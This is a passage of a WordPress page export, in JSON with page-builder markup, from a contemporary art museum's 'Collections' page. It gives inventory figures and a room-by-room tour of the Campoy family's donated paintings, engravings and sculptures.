{"id":278,"date":"2021-09-30T17:56:20","date_gmt":"2021-09-30T17:56:20","guid":{"rendered":"http:\/\/localhost\/museo\/?page_id=278"},"modified":"2021-11-25T10:03:01","modified_gmt":"2021-11-25T10:03:01","slug":"collections","status":"publish","type":"page","link":"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/","title":{"rendered":"Collections"},"content":{"rendered":"<p>[vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633342900444{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_single_image image=&#8221;529&#8243; img_size=&#8221;full&#8221; qode_css_animation=&#8221;&#8221;][vc_empty_space][vc_column_text]<\/p>\n<h1><strong>The Antonio Manuel Campoy Museum (MAMC) in figures.<\/strong><\/h1>\n<p>[\/vc_column_text][vc_column_text]<\/p>\n<h5>Within what we can call works, we will distinguish two main modalities when it comes to being practical: <strong>paintings<\/strong> and <strong>sculptures<\/strong>, and within the former we will follow the criteria of the catalog that classifies them on the one hand into &#8220;<strong>Painting, drawing and engraving<\/strong>&#8221; and , on the other, in &#8220;<strong>Engravings and etchings folders<\/strong>&#8220;, in addition to the third section of\u00a0 &#8220;<strong>Sculptures<\/strong>&#8220;.<\/h5>\n<h5>We have proceeded to contrast the different inventories of the works donated by the Campoy family with those registered in the catalog and in the examination of piece by piece, resulting in the numbering given to some of them, rather than a typical painting It was, for example, a family coat of arms, a photo or some written text, yes, framed. This makes the total number of <strong>tables in the inventory 393<\/strong>, when in fact there <strong>are 390<\/strong> that can be considered as such.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_single_image image=&#8221;333&#8243; img_size=&#8221;750&#215;247&#8243; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; qode_css_animation=&#8221;&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>Table 1: Number of MAMC Values<\/strong><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633342994643{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h1><strong>MAMC museum tour.<\/strong><\/h1>\n<p>[\/vc_column_text][vc_column_text]<\/p>\n<h5>When the palace of the Marquis was restored and we got ready to hang the pictures on its walls, along with the placement of the sculptures, both <strong>Rosita<\/strong> and <strong>Anastasio<\/strong> expressed their idea that their distribution and order through the exhibition spaces should not follow the criteria of the museum It is conventional to group the works by their artistic styles, <strong>but rather that their arrangement is done as it is done in a domestic environment<\/strong>, in which we place an <strong>impressionist painting next to a cubist<\/strong>, for example, <strong>aligned with a hyper-realistic work<\/strong>, this other example is also worth it. , and without leaving empty walls with hardly any hanging pictures. A placement that we could call familiar, as if entering the museum was similar to entering the Campoy house itself, full of pieces by the most prominent artists of 20th century Spanish contemporary art.<\/h5>\n<h5>In the museum we can distinguish seventeen<strong>\u00a0spaces<\/strong> of which four of them correspond to the four semi-cylindrical bastions in the four corners of the ground floor, which in peacetime were used to store gunpowder. As we will see, some of these spaces, although with different initially assigned uses, also ended up serving as showrooms given the high number of works donated by the Campoy family.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_single_image image=&#8221;340&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; qode_css_animation=&#8221;&#8221;][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633342994643{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h1><strong>The Rooms.<\/strong><\/h1>\n<p>[\/vc_column_text][vc_column_text]<\/p>\n<h5>From <strong>room 1 or hall<\/strong>, where we already find a couple of hanging paintings, <strong>room 2 opens to the left<\/strong>, which when the museum was opened was intended to be dedicated to temporary exhibitions, but which, due to the large number of pieces, <strong>became a more exhibition room and store of books<\/strong> from the Antonio Manuel Campoy library.<\/h5>\n<h5>In this room, still unexposed, is folder number 11 of ten etchings and lithographs made by the painter Marola, with texts \/ tributes to the painter from different art critics, including Antonio Manuel Campoy. And on its walls we can also see the work \u00ab<strong>Abstracci\u00f3n<\/strong>\u00bb, by <strong>Mercedes G\u00f3mez Pablos<\/strong>, an expressive composition, made with a mixed technique. And very close to it, a small painting by the Indalian and Almeria painter <strong>Francisco Capuleto<\/strong>, who draws us some \u00ab<strong>Toreros<\/strong>\u00bb with ink pen, in an expressionist style.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_single_image image=&#8221;346&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>G\u00d3MEZ PABLOS, Mercedes<\/strong><br \/>\n<em><strong>Abstracci\u00f3n<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_single_image image=&#8221;348&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>CAPULETO, Francisco<\/strong><br \/>\n<em><strong>Toreros<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633358213719{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h5>To the right of the hall the assembly hall opens, converted into <strong>room 3<\/strong>, where we can see other paintings, including the <strong>engraving of a woman<\/strong>, in which its author, <strong>Mat\u00edas Quetglas<\/strong>, makes a commitment to realism.<\/h5>\n<h5>Returning to the hall, in front of the entrance, we enter the interior patio, <strong>room 4<\/strong>, where some works are also hung, and, behind its glass door, <strong>in room 9<\/strong> we can see <strong>Francisco Abuja<\/strong>&#8216;s painting \u00ab<strong>El arte alimenta la paz<\/strong>\u00bb , figurative work, made in oil on canvas, in which its author shows his tendency to imagination and symbolism.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_single_image image=&#8221;353&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>QUETGLAS, Mat\u00edas<\/strong><br \/>\n<em><strong>Dibujo de mujer<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_single_image image=&#8221;355&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>ABUJA, Francisco Manuel<\/strong><br \/>\n<em><strong>El arte alimenta la paz<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633357948321{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h5>In <strong>room 10<\/strong> we can see a small and characteristic work of a <strong>landscape<\/strong> by the Indalian painter from Almer\u00eda <strong>Miguel Cant\u00f3n Checa<\/strong>. This figurative work is a characteristic example of its author&#8217;s technique of painting the Almeria landscape like few others, with its famous &#8220;<strong>Chancas<\/strong>&#8220;, in which the Mediterranean light stands out.<\/h5>\n<h5>In the same room stands out the magnificent oil on canvas by <strong>Mar\u00eda \u00c1ngeles Armas Marcelo<\/strong> entitled &#8220;<strong>Sign and chimera<\/strong>&#8220;, a surrealist work full of symbolism. And on the same wall, we stop at the \u00ab<strong>Puerta de Purchena<\/strong>\u00bb, a watercolor by the Cueva landscape artist <strong>Jos\u00e9 Antonio Canteras Alonso<\/strong>, and at \u00ab<strong>Mujer tumbada<\/strong>\u00bb, a figurative work in oil on canvas by <strong>Ricardo Serny<\/strong>.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;357&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>CANT\u00d3N CHECA, Miguel<\/strong><br \/>\n<em><strong>Paisaje<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;359&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>ARMAS MARCELO, M\u00aa \u00c1ngeles<\/strong><br \/>\n<em><strong>Signo y quimeras<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;361&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>CANTERAS ALONSO, Jose Antonio<\/strong><br \/>\n<em><strong>Puerta de Purchena<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;363&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>SERNY, Ricardo<\/strong><br \/>\n<em><strong>Mujer tumbada<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633358334718{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h5>In this room, in four showcases, some of the plates from the <strong>first of the etchings and etchings folders (by Javier Clavo), third (by Maruja Mallo), fourth (by Albert Duce) and sixth (by Enrique) are kept and exhibited. Cortina and Arregui)<\/strong>.<\/h5>\n<h5>Going up the stairs to the first floor we can see two avant-garde works. Firstly, the &#8220;<strong>Dado<\/strong>s&#8221; silkscreen by the Hungarian <strong>V\u00edctor Vassarely<\/strong>, a beautiful geometric composition of optical art, in which linear and polyhedral dynamism is combined with a calculated color combination limited to white, red and black. And secondly, the work of the Bulgarian <strong>Mar\u00eda Droc \u00abJuegos \u00f3pticos\u00bb<\/strong> brings us once again the innovative air of modernity with the pieces that make up a frame-object.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_single_image image=&#8221;366&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>VASSARELY, Victor<\/strong><br \/>\n<em><strong>Dados<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_single_image image=&#8221;368&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>DROC, Mar\u00eda<\/strong><br \/>\n<em><strong>Juegos \u00f3pticos<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633357936634{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h5><strong>Room 11<\/strong> could be called the one with the <strong>Campoy family portraits<\/strong>, some oil paintings on canvas by <strong>Anastasio<\/strong>, painted <strong>by Joaqu\u00edn C\u00e1novas; of Rosita, by Guillermo Vargas Ruiz, and of Antonio Manuel, by Antonio Bisquert<\/strong>. In the same room we can also enjoy the magnificent &#8220;<strong>Primavera<\/strong>&#8221; by <strong>Enrique Padiel<\/strong>, a true explosion of colors in quasi-impressionist brushstrokes but in a figurative work, and the work of <strong>Jes\u00fas de Perceval<\/strong>, in encaustic, &#8220;<strong>Head of a woman. Sadness<\/strong>&#8220;.<\/h5>\n<h5>Also very interesting is <strong>Venancio Blanco&#8217;s sculpture of \u00abSanta Teresa<\/strong>\u00bb, in cast bronze, with a post-cubist style, with which the artist became the master of the new religious sculpture<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;371&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>PADIAL, Enrique<\/strong><br \/>\n<em><strong>Primavera<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;373&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>BLANCO, Venancio<\/strong><br \/>\n<em><strong>Santa Teresa<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;318&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>PERCEVAL, Jesus de<\/strong><br \/>\n<em><strong>Cabeza de mujer &#8220;Tristeza&#8221;<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633357984940{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h5><strong>Room 12<\/strong> is dominated by an oil on canvas, resting on an easel, by <strong>Pilar de Aristegui<\/strong>, \u00ab<strong>Ferias-Kenya<\/strong>\u00bb, in a naive style, in the artist&#8217;s line of recreating paradise with suggestive naivety.<\/h5>\n<h5>Three showcases contain three folders of engravings and etchings: <strong>the second (by Guillermo Vargas Ru\u00edz), the seventh (by Vicente Arn\u00e1s) and the eighth (by Carmen Lastra)<\/strong>.<\/h5>\n<h5>In the same room, Perceval&#8217;s <strong>disciple Francisco Alcaraz<\/strong>, in his oil on canvas \u00ab<strong>Ni\u00f1a<\/strong>\u00bb makes a colorist exaltation characteristic of the Indalian movement.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_single_image image=&#8221;376&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>ARISTEGUI, Pilar de<\/strong><br \/>\n<em><strong>Ferias Kenia<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_single_image image=&#8221;316&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>ALCARAZ, Francisco<\/strong><br \/>\n<em><strong>Ni\u00f1a<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633358015778{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h5><strong>Room 13<\/strong> is perhaps the <strong>most important in the museum<\/strong>. In it we begin by contemplating a drawing by <strong>Benjam\u00edn Palencia<\/strong>, \u00ab<strong>Dibujo de una mujer<\/strong>\u00bb, which brings us closer to his good work as an expressionist painter, just like <strong>Antoni T\u00e1pies<\/strong> with his \u00ab<strong>Fantas\u00eda<\/strong>\u00bb, a mixed media informalist work, places us before one of the most prestigious painters in Spain.<\/h5>\n<h5>\u00ab<strong>Campesino de la Olmeda<\/strong>\u00bb, an oil on canvas by <strong>\u00c1lvaro Delgado<\/strong>, is an expressionist work of cubist influence, which reflects the testimony of its author of his passage through the Madrid region that gives its name to the painting, portraying his peasant.<\/h5>\n<h5>Another outstanding work in the same room is the also oil on canvas by <strong>Manuel Baeza<\/strong> entitled &#8220;<strong>Maternidad<\/strong>&#8220;, which although surrealist in style has a stylization close to cubism. Just as the <strong>sketch by Jos\u00e9 Guti\u00e9rrez Solana<\/strong> is important for a larger work, in oil on panel, in an expressionist style with gloomy pictorial tints..<\/h5>\n<h5>Also noteworthy is <strong>Pablo Ruiz Picasso<\/strong>&#8216;s engraving of the series &#8220;<strong>La mujer y el minotauro<\/strong>&#8220;, within the mythological figurative tradition.<\/h5>\n<h5>Finally, we will stop at the sculptures by <strong>Venancio Blanco<\/strong>, \u00ab<strong>Cisne<\/strong>\u00bb, and at the one by <strong>Santiago de Santiago<\/strong>, \u00ab<strong>Cabeza del pr\u00edncipe de Espa\u00f1a<\/strong>\u00bb, both in cast bronze.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][qode_content_slider enable_drag=&#8221;yes&#8221; direction_nav=&#8221;yes&#8221; control_nav=&#8221;no&#8221; pause_on_hover=&#8221;no&#8221;][qode_content_slider_item][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;378&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>PALENCIA, Benjam\u00edn<\/strong><br \/>\n<em><strong>Dibujo de mujer<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;380&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>T\u00c1PIES, Antoni<\/strong><br \/>\n<em><strong>Fantas\u00eda<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;314&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>DELGADO, \u00c1lvaro<\/strong><br \/>\n<em><strong>Campesino de la Olmeda<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;382&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>BAEZA, Manuel<\/strong><br \/>\n<em><strong>Maternidad<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][\/vc_row_inner][\/qode_content_slider_item][qode_content_slider_item][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;312&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>SOLANA, Jos\u00e9 Gutierrez<\/strong><br \/>\n<em><strong>Boceto<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;384&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>PICASSO, Pablo Ruiz<\/strong><br \/>\n<em><strong>La mujer y el minotauro<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;575&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>BLANCO, Venancio<\/strong><br \/>\n<em><strong>Cisne<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;388&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>SANTIAGO, Santiago de<\/strong><br \/>\n<em><strong>Cabeza Pr\u00edncipe de Espa\u00f1a<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/qode_content_slider_item][\/qode_content_slider][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633357587876{padding-top: 